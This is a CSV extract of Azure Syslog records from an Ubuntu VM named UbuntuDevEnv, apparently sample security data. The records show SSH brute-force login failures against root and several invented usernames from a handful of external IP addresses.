+13864,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:39,UbuntuDevEnv,2019-06-26 04:48:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=95.216.195.95,1273,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,95.216.195.9,,0,
+13865,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:39,UbuntuDevEnv,2019-06-26 04:48:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,1273,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13866,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:40,UbuntuDevEnv,2019-06-26 04:48:39,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 20094 ssh2,1246,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,20094,,
+13867,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:41,UbuntuDevEnv,2019-06-26 04:48:40,auth,UbuntuDevEnv,info,Failed password for invalid user yarn from 95.216.195.95 port 36118 ssh2,1273,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yarn,95.216.195.9,36118,,
+13868,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:41,UbuntuDevEnv,2019-06-26 04:48:41,auth,UbuntuDevEnv,info,Received disconnect from 95.216.195.95 port 36118:11: Bye Bye [preauth],1273,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,95.216.195.9,36118,,
+13869,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:41,UbuntuDevEnv,2019-06-26 04:48:41,auth,UbuntuDevEnv,info,Disconnected from invalid user yarn 95.216.195.95 port 36118 [preauth],1273,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yarn,95.216.195.9,36118,,
+13870,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:42,UbuntuDevEnv,2019-06-26 04:48:41,auth,UbuntuDevEnv,info,Invalid user zenenko from 45.55.190.46 port 36086,1202,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zenenko,45.55.190.4,36086,,
+13871,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:42,UbuntuDevEnv,2019-06-26 04:48:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,1202,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13872,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:42,UbuntuDevEnv,2019-06-26 04:48:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.55.190.46,1202,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.55.190.4,,0,
+13873,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:43,UbuntuDevEnv,2019-06-26 04:48:42,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 20094 ssh2,1246,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,20094,,
+13874,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:44,UbuntuDevEnv,2019-06-26 04:48:44,auth,UbuntuDevEnv,info,Failed password for invalid user zenenko from 45.55.190.46 port 36086 ssh2,1202,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zenenko,45.55.190.4,36086,,
+13875,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:46,UbuntuDevEnv,2019-06-26 04:48:45,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 20094 ssh2,1246,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,20094,,
+13876,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:51,UbuntuDevEnv,2019-06-26 04:48:51,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 20094: Too many authentication failures [preauth],1246,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,20094,,
+13877,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:51,UbuntuDevEnv,2019-06-26 04:48:51,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 58.242.82.13 port 20094 ssh2],1246,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,20094,,
+13878,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:51,UbuntuDevEnv,2019-06-26 04:48:51,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,1246,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13879,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:51,UbuntuDevEnv,2019-06-26 04:48:51,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 20094 ssh2 [preauth],1246,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,20094,,
+13880,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:51,UbuntuDevEnv,2019-06-26 04:48:51,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,1246,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13881,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:54,UbuntuDevEnv,2019-06-26 04:48:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,1412,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13882,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:54,UbuntuDevEnv,2019-06-26 04:48:54,auth,UbuntuDevEnv,info,Received disconnect from 45.55.190.46 port 36086:11: Bye Bye [preauth],1202,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.55.190.4,36086,,
+13883,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:54,UbuntuDevEnv,2019-06-26 04:48:54,auth,UbuntuDevEnv,info,Disconnected from invalid user zenenko 45.55.190.46 port 36086 [preauth],1202,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zenenko,45.55.190.4,36086,,
+13884,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:48:56,UbuntuDevEnv,2019-06-26 04:48:56,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 25915 ssh2,1412,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,25915,,
+13885,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:49:01,UbuntuDevEnv,2019-06-26 04:48:58,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 25915 ssh2,1412,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,25915,,
+13886,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:49:02,UbuntuDevEnv,2019-06-26 04:49:01,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 25915 ssh2,1412,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,25915,,
+13887,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:49:11,UbuntuDevEnv,2019-06-26 04:49:10,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,1412,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13888,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:49:11,UbuntuDevEnv,2019-06-26 04:49:10,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 25915: Too many authentication failures [preauth],1412,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,25915,,
+13889,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:49:11,UbuntuDevEnv,2019-06-26 04:49:10,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,1412,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13890,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:49:11,UbuntuDevEnv,2019-06-26 04:49:10,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 58.242.82.13 port 25915 ssh2],1412,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,25915,,
+13891,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:49:11,UbuntuDevEnv,2019-06-26 04:49:10,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 25915 ssh2 [preauth],1412,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,25915,,
+13892,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:49:14,UbuntuDevEnv,2019-06-26 04:49:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,1546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13893,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:49:15,UbuntuDevEnv,2019-06-26 04:49:15,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 31871 ssh2,1546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,31871,,
+13894,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:49:18,UbuntuDevEnv,2019-06-26 04:49:17,auth,UbuntuDevEnv,info,Invalid user antonio from 119.123.240.8 port 51166,1519,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,antonio,119.123.240.8,51166,,
+13895,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:49:18,UbuntuDevEnv,2019-06-26 04:49:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,1519,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13896,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:49:18,UbuntuDevEnv,2019-06-26 04:49:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=119.123.240.8,1519,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.123.240.8,,0,
+13897,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:49:19,UbuntuDevEnv,2019-06-26 04:49:18,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 31871 ssh2,1546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,31871,,
+13898,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:49:20,UbuntuDevEnv,2019-06-26 04:49:19,auth,UbuntuDevEnv,info,Failed password for invalid user antonio from 119.123.240.8 port 51166 ssh2,1519,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,antonio,119.123.240.8,51166,,
+13899,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:49:21,UbuntuDevEnv,2019-06-26 04:49:20,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 31871 ssh2,1546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,31871,,
+13900,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:49:21,UbuntuDevEnv,2019-06-26 04:49:21,auth,UbuntuDevEnv,info,Disconnected from invalid user antonio 119.123.240.8 port 51166 [preauth],1519,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,antonio,119.123.240.8,51166,,
+13901,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:49:21,UbuntuDevEnv,2019-06-26 04:49:21,auth,UbuntuDevEnv,info,Received disconnect from 119.123.240.8 port 51166:11: Bye Bye [preauth],1519,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,119.123.240.8,51166,,
+13902,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:49:24,UbuntuDevEnv,2019-06-26 04:49:23,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 31871 ssh2,1546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,31871,,
+13903,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:49:29,UbuntuDevEnv,2019-06-26 04:49:29,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 58.242.82.13 port 31871 ssh2],1546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,31871,,
+13904,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:49:29,UbuntuDevEnv,2019-06-26 04:49:29,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,1546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13905,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:49:29,UbuntuDevEnv,2019-06-26 04:49:29,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,1546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13906,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:49:29,UbuntuDevEnv,2019-06-26 04:49:29,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 31871 ssh2 [preauth],1546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,31871,,
+13907,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:49:29,UbuntuDevEnv,2019-06-26 04:49:29,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 31871: Too many authentication failures [preauth],1546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,31871,,
+13908,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:49:32,UbuntuDevEnv,2019-06-26 04:49:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,1603,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13909,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:49:34,UbuntuDevEnv,2019-06-26 04:49:34,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 37328 ssh2,1603,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,37328,,
+13910,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:49:45,UbuntuDevEnv,2019-06-26 04:49:42,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 58.242.82.13 port 37328 ssh2],1603,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,37328,,
+13911,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:49:45,UbuntuDevEnv,2019-06-26 04:49:45,auth,UbuntuDevEnv,info,Invalid user marcos from 200.6.188.38 port 17187,1651,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,marcos,200.6.188.3,17187,,
+13912,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:49:45,UbuntuDevEnv,2019-06-26 04:49:45,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,1651,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13913,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:49:45,UbuntuDevEnv,2019-06-26 04:49:45,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.6.188.38,1651,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.6.188.3,,0,
+13914,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:49:46,UbuntuDevEnv,2019-06-26 04:49:45,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 37328 ssh2,1603,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,37328,,
+13915,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:49:48,UbuntuDevEnv,2019-06-26 04:49:47,auth,UbuntuDevEnv,info,Failed password for invalid user marcos from 200.6.188.38 port 17187 ssh2,1651,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,marcos,200.6.188.3,17187,,
+13916,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:49:48,UbuntuDevEnv,2019-06-26 04:49:47,auth,UbuntuDevEnv,info,Disconnected from invalid user marcos 200.6.188.38 port 17187 [preauth],1651,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,marcos,200.6.188.3,17187,,
+13917,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:49:48,UbuntuDevEnv,2019-06-26 04:49:47,auth,UbuntuDevEnv,info,Received disconnect from 200.6.188.38 port 17187:11: Bye Bye [preauth],1651,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.6.188.3,17187,,
+13918,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:49:49,UbuntuDevEnv,2019-06-26 04:49:48,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,1603,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13919,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:49:49,UbuntuDevEnv,2019-06-26 04:49:48,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 37328: Too many authentication failures [preauth],1603,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,37328,,
+13920,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:49:49,UbuntuDevEnv,2019-06-26 04:49:48,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,1603,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13921,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:49:49,UbuntuDevEnv,2019-06-26 04:49:48,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 37328 ssh2 [preauth],1603,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,37328,,
+13922,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:49:49,UbuntuDevEnv,2019-06-26 04:49:48,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 37328 ssh2,1603,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,37328,,
